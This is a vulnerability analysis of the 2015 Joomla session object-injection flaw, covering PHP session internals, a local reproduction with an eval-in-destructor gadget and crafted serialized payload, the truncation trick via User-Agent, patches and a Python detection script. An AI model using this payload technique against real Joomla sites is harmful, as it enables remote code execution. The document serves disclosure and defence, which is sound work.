Joomla \libraries\joomla\session\session.php: object injection caused by unserializing a truncated, malformed session string
catalog
. Vulnerability description
. PHP session persistence
. PHP serialize/unserialize kernel implementation
. Vulnerability code analysis
. POC construction techniques
. Defense plan
. Code patch plan
1. Vulnerability description
When Joomla processes serialized SESSION data it does not strictly validate the serialization format, so an attacker can craft a malformed HTTP request and achieve object injection.
Relevant Link:
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
http://www.freebuf.com/vuls/89599.html
2. PHP session persistence
0x1: Session overview
Session support in PHP is a way to preserve certain data across successive accesses, which lets you build more customized programs and make your web site more appealing.
A visitor to your web site is assigned a unique id, the so-called session id. This id can be stored in a cookie on the user side or passed in the URL.
Session support lets you keep request data in the superglobal array $_SESSION. When a visitor accesses your site, PHP checks automatically (if session.auto_start is set to 1) or on your request (explicitly via session_start() or implicitly via session_register()) whether the current session id was created by an earlier request. If so, the previously saved environment is restored.
$_SESSION (and all registered variables) are serialized by PHP with an internal serialization method when the request completes. The serialization method can be set to a specific handler through the session.serialize_handler PHP configuration option. Registered variables that are undefined are marked as undefined; on subsequent accesses these variables are not defined by the session module unless the user defines them later.
0x2: The SessionHandler class
SessionHandler is a special class that can be used to expose the current internal PHP session save handler by inheritance. There are seven methods which wrap the seven internal session save handler callbacks
. open
. close
. read
. write
. destroy
. gc
. create_sid
By default, this class will wrap whatever internal save handler is set as defined by the session.save_handler configuration directive which is usually files by default. Other internal session save handlers are provided by PHP extensions such as SQLite (as sqlite), Memcache (as memcache), and Memcached (as memcached).
<?php
echo ini_get('session.save_handler');
?>
When a plain instance of SessionHandler is set as the save handler using session_set_save_handler() it will wrap the current save handlers. A class extending from SessionHandler allows you to override the methods, or intercept or filter them by calling the parent class methods, which ultimately wrap the internal PHP session handlers.
This allows you, for example, to intercept the read and write methods to encrypt/decrypt the session data and then pass the result to and from the parent class. Alternatively one might choose to entirely override a method like the garbage collection callback gc.
Because the SessionHandler wraps the current internal save handler methods, the above example of encryption can be applied to any internal save handler without having to know the internals of the handlers.
<?php
/**
 * decrypt AES 256
 *
 * @param data $edata
 * @param string $password
 * @return decrypted data
 */
function decrypt($edata, $password) {
    $data = base64_decode($edata);
    $salt = substr($data, 0, 16);
    $ct = substr($data, 16);
    $rounds = 3; // depends on key length
    $data00 = $password.$salt;
    $hash = array();
    $hash[0] = hash('sha256', $data00, true);
    $result = $hash[0];
    for ($i = 1; $i < $rounds; $i++) {
        $hash[$i] = hash('sha256', $hash[$i - 1].$data00, true);
        $result .= $hash[$i];
    }
    $key = substr($result, 0, 32);
    $iv = substr($result, 32, 16);
    return openssl_decrypt($ct, 'AES-256-CBC', $key, true, $iv);
}

/**
 * crypt AES 256
 *
 * @param data $data
 * @param string $password
 * @return base64 encrypted data
 */
function encrypt($data, $password) {
    // Set a random salt
    $salt = openssl_random_pseudo_bytes(16);

    $salted = '';
    $dx = '';
    // Salt the key(32) and iv(16) = 48
    while (strlen($salted) < 48) {
        $dx = hash('sha256', $dx.$password.$salt, true);
        $salted .= $dx;
    }

    $key = substr($salted, 0, 32);
    $iv = substr($salted, 32, 16);

    $encrypted_data = openssl_encrypt($data, 'AES-256-CBC', $key, true, $iv);
    return base64_encode($salt . $encrypted_data);
}

class EncryptedSessionHandler extends SessionHandler
{
    private $key;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function read($id)
    {
        $data = parent::read($id);
        var_dump($data);
        if (!$data) {
            return "";
        } else {
            return decrypt($data, $this->key);
        }
    }

    public function write($id, $data)
    {
        $data = encrypt($data, $this->key);
        return parent::write($id, $data);
    }
}

// we'll intercept the native 'files' handler, but will equally work
// with other internal native handlers like 'sqlite', 'memcache' or 'memcached'
// which are provided by PHP extensions.
ini_set('session.save_handler', 'files');

$key = 'secret_string';
$handler = new EncryptedSessionHandler($key);
session_set_save_handler($handler, true);
session_start();

$_SESSION['OP'] = "HE;L";
var_dump($_SESSION);
?>
What must be understood here is that PHP's session persistence and serialize() serialization are two completely independent things. Session persistence (including a custom session handler) essentially only defines an algorithm for persisting the values held in the superglobal $_SESSION to third-party storage (for example a file on disk).
Serialization, by contrast, is essentially an encoding transform. It was designed for network transport and persistent storage, and because of that property it is used by default in PHP's session persistence. In summary, PHP's session persistence flow is:
//session store
. PHP serializes the values in $_SESSION, producing $result
. PHP calls the user-defined write function to apply its custom processing to $result
. The result is written to persistent storage
//$_SESSION['OP'] = HE;L -> OP|s:4:"HE;L"; -> T1B8czo0OiJIRTtMIjs=
//session load
. The string $input is read from persistent storage
. PHP calls the user-defined read function to process $input
. When $_SESSION values are accessed, PHP automatically unserializes the result of the previous step
//T1B8czo0OiJIRTtMIjs= -> OP|s:4:"HE;L"; -> $_SESSION['OP'] = HE;L
Relevant Link:
http://php.net/manual/zh/intro.session.php
http://php.net/manual/zh/class.sessionhandler.php
http://drops.wooyun.org/tips/3909
http://bobao.360.cn/learning/detail/2499.html
http://weibo.com/p/1001603920354568452417
http://php.net/manual/zh/function.session-set-save-handler.php
3. PHP serialize/unserialize kernel implementation
\php-src-master\ext\session\session.c
#define PS_DELIMITER '|'
#define PS_UNDEF_MARKER '!'

PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
{
    const char *p, *q;
    const char *endptr = val + vallen;
    zval current;
    int has_value;
    int namelen;
    zend_string *name;
    php_unserialize_data_t var_hash;

    PHP_VAR_UNSERIALIZE_INIT(var_hash);

    p = val;

    while (p < endptr)
    {
        zval *tmp;
        q = p;
        // search for the position of the serialization delimiter "|"
        while (*q != PS_DELIMITER)
        {
            // scan character by character up to the end of the serialized string
            if (++q >= endptr) goto break_outer_loop;
        }
        // PS_UNDEF_MARKER = '!'
        if (p[0] == PS_UNDEF_MARKER)
        {
            p++;
            has_value = 0;
        }
        else
        {
            has_value = 1;
        }

        // p is where this scan started, so q - p is the key name before "|"
        namelen = q - p;
        // fetch the key name
        name = zend_string_init(p, namelen, 0);
        q++;

        if ((tmp = zend_hash_find(&EG(symbol_table), name)))
        {
            if ((Z_TYPE_P(tmp) == IS_ARRAY && Z_ARRVAL_P(tmp) == &EG(symbol_table)) || tmp == &PS(http_session_vars))
            {
                goto skip;
            }
        }

        if (has_value)
        {
            ZVAL_UNDEF(&current);
            // call php_var_unserialize to parse the value belonging to this key
            if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash))
            {
                zval *zv = php_set_session_var(name, &current, &var_hash);
                var_replace(&var_hash, &current, zv);
            }
            else
            {
                zval_ptr_dtor(&current);
            }
        }
        PS_ADD_VARL(name);
skip:
        zend_string_release(name);
        p = q;
    }
break_outer_loop:

    PHP_VAR_UNSERIALIZE_DESTROY(var_hash);

    return SUCCESS;
}
/* }}} */
Following into php_var_unserialize, we focus on the key code logic
\php-src-master\ext\standard\var_unserializer.c
/*
The pointer moves through the serialized data; when it reaches data such as 130:"_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}
len = parse_uiv(start + 2); parse_uiv reads the value 130 into len
*/
len2 = len = parse_uiv(start + 2);
/*
maxlen = max - YYCURSOR;
the length of the data remaining after the current pointer
*/
maxlen = max - YYCURSOR;
if (maxlen < len || len == 0)
{
    *p = start + 2;
    return 0;
}
// So the if condition holds and the inner branch runs: unserialization fails and returns 0, while the pointer p is left at start + 2, just past the "s:" of the entry that failed
php_var_unserialize returns 0, and back in the session decoder:
if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC))
{
    php_set_session_var(name, namelen, current, &var_hash TSRMLS_CC);
}
zval_ptr_dtor(&current);
efree(name);
p = q;
The current variable is destroyed, p = q, and the next iteration of the loop starts searching for "|" again from that position, so the _test| we injected is now treated as a key.
To summarize the causes behind this vulnerability's exploitation
. Joomla uses a custom session persistence handler that stores session data in a MySQL database
. Joomla saves HTTP_USER_AGENT and HTTP_X_FORWARDED_FOR from the HTTP request into the $_SESSION superglobal, which is then persisted
. In the request carrying the HTTP_USER_AGENT payload, the attacker relies on two key ingredients
) "|" (the key-value separator): }__test|O::"JData
) a truncation character: }__test|O::"JData...(%F0%9D%8C%86)
. On the attacker's second visit, Joomla's $browser = $this->get('session.client.browser'); reads the session data back from the database and tries to unserialize it
. MySQL treats the character %F0%9D%8C%86 (a 4-byte UTF-8 sequence, which a utf8 column cannot store) as a truncation point, so when the attacker's HTTP request contains such a character, everything after it is cut off
. Because of the truncation, when the PHP kernel parses the string following session.client.forwarded the length check fails, so php_var_unserialize exits early and returns false
. After a failed php_var_unserialize, PHP resumes the next key-value attempt from the pointer position the previous one left behind
. In that next attempt the PHP kernel takes the attacker's injected "|" as the separator and parses a key-value pair from it, resulting in object injection
0x1: Reproduction outside Joomla
To reproduce the same malformed-string parsing problem, we build the following code
<?php
class Example
{
    var $var = '';
    function __destruct()
    {
        eval($this->var);
    }
}

// the save handler must be set before the session is started
ini_set('session.save_handler', 'files');
session_start();

$_SESSION['prefix'] = 'hello';
$_SESSION['pyaload'] = '_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}';
$_SESSION['after'] = 'alibaba';

var_dump($_SESSION);
?>
After visiting the page, we edit the session persistence file on disk by hand to trigger PHP's malformed parsing deliberately
/*
1. Delete the closing double quote after phpinfo();";} and everything after it, simulating MySQL's special-character truncation
2. Change the length after pyaload|s: to 130, far more than the original 70, so that the length-mismatch condition is met
*/
prefix|s:5:"hello";pyaload|s:130:"_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}
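The decode loop and its failure path, modelled in Python so the resync behaviour can be observed directly. This is an added example, not code from php-src, Joomla or the original post: it models only the s:, i: and O: value forms, reports an object value instead of instantiating anything, and takes the hand-edited session record above as constructed input. The strict variant models the later PHP behaviour described in the defense plan, where the first parse failure discards the whole session.

```python
# Added example (not php-src or Joomla code): a Python model of the "php"
# session serializer's decode loop, showing why a truncated entry with an
# inflated length lets a later "|" be re-read as a key separator, and how the
# stricter "discard the whole session on the first failure" rule closes it.
# Only the s:<len>:"..."; i:<n>; and O: forms are modelled; an O: value is
# never instantiated, it is only reported as having reached the unserializer.
from dataclasses import dataclass, field

PS_DELIMITER = "|"


@dataclass
class DecodeResult:
    values: dict = field(default_factory=dict)        # key -> parsed value
    object_keys: list = field(default_factory=list)   # keys whose value was O:...
    failures: list = field(default_factory=list)      # keys whose value failed to parse
    aborted: bool = False


def unserialize_one(data: str, pos: int):
    """Model of php_var_unserialize for one value at data[pos:].

    Returns (ok, value, new_pos, kind). On a length mismatch it mimics the C
    code: ok=False and new_pos = start + 2 (just after the "s:" marker).
    """
    start = pos
    if data.startswith("s:", pos):
        end_len = data.find(":", pos + 2)
        if end_len == -1 or not data[pos + 2:end_len].isdigit():
            return False, None, start + 2, "string"
        length = int(data[pos + 2:end_len])
        body_start = end_len + 2                  # skip the :" that follows the length
        maxlen = len(data) - body_start
        if maxlen < length or length == 0:        # the check from var_unserializer
            return False, None, start + 2, "string"
        body = data[body_start:body_start + length]
        tail = data[body_start + length:body_start + length + 2]
        if tail != '";':
            return False, None, start + 2, "string"
        return True, body, body_start + length + 2, "string"
    if data.startswith("i:", pos):
        end = data.find(";", pos)
        if end == -1:
            return False, None, start + 2, "int"
        return True, int(data[pos + 2:end]), end + 1, "int"
    if data.startswith("O:", pos):
        # A real unserializer would build the object here; the model consumes
        # the rest of the record and only flags that an object was reached.
        return True, "<object>", len(data), "object"
    return False, None, start + 2, "unknown"


def decode_session(data: str, strict: bool) -> DecodeResult:
    """Model of PS_SERIALIZER_DECODE_FUNC(php).

    strict=False mirrors the loop above: after a failed value the scan simply
    continues from wherever the unserializer left the pointer.
    strict=True models the later fix: the first failure discards the session.
    """
    res = DecodeResult()
    p, end = 0, len(data)
    while p < end:
        q = data.find(PS_DELIMITER, p)          # search for the next "|"
        if q == -1:
            break                               # break_outer_loop
        has_value = True
        if data[p] == "!":                      # PS_UNDEF_MARKER
            p += 1
            has_value = False
        name = data[p:q]
        q += 1
        if has_value:
            ok, value, q, kind = unserialize_one(data, q)
            if ok:
                res.values[name] = value
                if kind == "object":
                    res.object_keys.append(name)
            else:
                res.failures.append(name)
                if strict:
                    res.aborted = True
                    res.values.clear()
                    res.object_keys.clear()
                    return res
        p = q                                   # resume from the pointer left behind
    return res


# Constructed input: the hand-edited session file from the walkthrough above
# (length inflated to 130, closing quote and the rest of the record removed).
TAMPERED = ('prefix|s:5:"hello";'
            'pyaload|s:130:"_test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}')

if __name__ == "__main__":
    print("lax:   ", decode_session(TAMPERED, strict=False))
    print("strict:", decode_session(TAMPERED, strict=True))
```

In the lax mode the failed pyaload entry leaves the pointer just after its "s:", so the next scan finds the injected "|" and hands the O: fragment to the unserializer under the key 130:"_test; in strict mode the same failure discards everything, and the object fragment is never reached.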
Relevant Link:
https://github.com/php/php-src/blob/PHP-5.4.5/ext/session/session.c
4. Vulnerability code analysis
\Joomla_3.4.5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php
// Record proxy forwarded for in the session in case we need it later
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    // save HTTP_X_FORWARDED_FOR from the HTTP request into the global session
    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
}

// Check for client address
if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))
{
    $ip = $this->get('session.client.address');

    if ($ip === null)
    {
        $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);
    }
    elseif ($_SERVER['REMOTE_ADDR'] !== $ip)
    {
        $this->_state = 'error';

        return false;
    }
}

// Check for clients browser
if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
{
    $browser = $this->get('session.client.browser');

    if ($browser === null)
    {
        // save HTTP_USER_AGENT from the HTTP request into the global session
        $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
    }
    elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
    {
        // @todo remove code: $this->_state = 'error';
        // @todo remove code: return false;
    }
}
The data from the attacker's malformed HTTP request is saved by Joomla into the global session. Session initialization normally happens before any application code runs, but Joomla uses a custom session storage mechanism: it replaces PHP's built-in storage with its own storage functions registered through session_set_save_handler.
\Joomla_3.4.5\libraries\joomla\session\storage.php
public function register()
{
    // Use this object as the session handler
    session_set_save_handler(
        array($this, 'open'), array($this, 'close'), array($this, 'read'), array($this, 'write'), array($this, 'destroy'), array($this, 'gc')
    );
}
Relevant Link:
http://zone.wooyun.org/content/24440
http://zone.wooyun.org/content/24444
http://drops.wooyun.org/papers/11330
5. POC construction techniques
http://drops.wooyun.org/papers/11330
6. Defense plan
. /Joomla/configuration.php
class JConfig
{
    ..
    public $session_handler = 'files';
}
. Upgrade PHP to >= 5.6.13
Starting with PHP 5.6.13, if the first variable fails to parse, the whole session is destroyed outright
. Joomla CMS code fix
https://github.com/joomla/joomla-cms/releases/download/3.4.6/Joomla_3.4.5_to_3.4.6-Stable-Patch_Package.tar.gz
\Joomla_3.4.5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php
. Stop accepting HTTP_USER_AGENT
. Use filter_var to verify that HTTP_X_FORWARDED_FOR is a well-formed IP address, blocking injection through this field
// Check for client address
if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)
{
    $ip = $this->get('session.client.address');

    if ($ip === null)
    {
        $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);
    }
    elseif ($_SERVER['REMOTE_ADDR'] !== $ip)
    {
        $this->_state = 'error';

        return false;
    }
}

// Record proxy forwarded for in the session in case we need it later
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)
{
    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
}
7. Code patch plan
\libraries\joomla\session\session.php
// Record proxy forwarded for in the session in case we need it later
/*
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
*/
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)
{
    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
}

// Check for client address
/*
if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))
*/
if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)
{
    $ip = $this->get('session.client.address');

    if ($ip === null)
    {
        $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);
    }
    elseif ($_SERVER['REMOTE_ADDR'] !== $ip)
    {
        $this->_state = 'error';

        return false;
    }
}

// Check for clients browser
if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
{
    /*
    $browser = $this->get('session.client.browser');
    */
    $browser = "";

    if ($browser === null)
    {
        /*
        $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
        */
        $this->set('session.client.browser', "");
    }
    elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
    {
        // @todo remove code: $this->_state = 'error';
        // @todo remove code: return false;
    }
}
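As an added example (not Joomla's or PHP's code), the two defender-side checks that follow from the defense plan and the patch above, written in Python so they run stand-alone: an IP validation with the same intent as the filter_var(..., FILTER_VALIDATE_IP) fix, and a scan over constructed request-log lines for the two ingredients identified in section 3 (a "|" followed by a serialized-object marker, and a 4-byte UTF-8 character that a MySQL utf8 column truncates). The header names, the "name: value" log-line format and all sample values are assumptions.

```python
# Added example (not Joomla's or PHP's code): defender-side checks derived
# from the analysis above. validate_forwarded_for() mirrors the intent of the
# filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) fix, so only
# a well-formed IP is ever stored in the session. suspicious_header_values()
# scans constructed log lines for the two ingredients the analysis identifies.
import ipaddress
import re

# "|" then a serialized object marker such as O:7:" (or C: for custom objects)
OBJECT_AFTER_DELIMITER = re.compile(r'\|\s*[OC]:\d+:"')


def validate_forwarded_for(value):
    """Return the IP string if value is one valid IPv4/IPv6 address, else None.

    Like FILTER_VALIDATE_IP, a list such as "1.2.3.4, 5.6.7.8" is rejected, so a
    proxy chain must be split by the caller before its first hop is validated.
    """
    if value is None:
        return None
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def header_findings(name, value):
    """Return the reasons a header value should not reach the session store."""
    reasons = []
    if OBJECT_AFTER_DELIMITER.search(value):
        reasons.append("delimiter followed by serialized object marker")
    if any(ord(ch) > 0xFFFF for ch in value):
        reasons.append("4-byte UTF-8 character (utf8 column truncation)")
    if name == "X-Forwarded-For" and validate_forwarded_for(value) is None:
        reasons.append("not a valid IP address")
    return reasons


def suspicious_header_values(log_lines):
    """Scan constructed 'name: value' lines; return {line: [reasons]} for hits."""
    hits = {}
    for line in log_lines:
        name, _, value = line.partition(": ")
        reasons = header_findings(name, value)
        if reasons:
            hits[line] = reasons
    return hits


# Constructed sample lines (not real traffic), modelled on the two headers the
# session code stores; the second line reuses the Example payload from above
# followed by the 4-byte character U+1D306.
SAMPLE_LOG = [
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0",
    'User-Agent: }__test|O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}\U0001D306',
    "X-Forwarded-For: 203.0.113.7",
    "X-Forwarded-For: 203.0.113.7, 198.51.100.2",
    "X-Forwarded-For: 2001:db8::1",
]

if __name__ == "__main__":
    for line, reasons in suspicious_header_values(SAMPLE_LOG).items():
        print(line, "->", reasons)
```

The IP check rejects a comma-separated proxy chain exactly as FILTER_VALIDATE_IP does, which is why the Joomla fix silently drops such a header instead of storing it; the header scan is a detection aid for logs or WAF rules, not a replacement for the strict session decoder.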
Copyright (c) 2015 Little5ann All rights reserved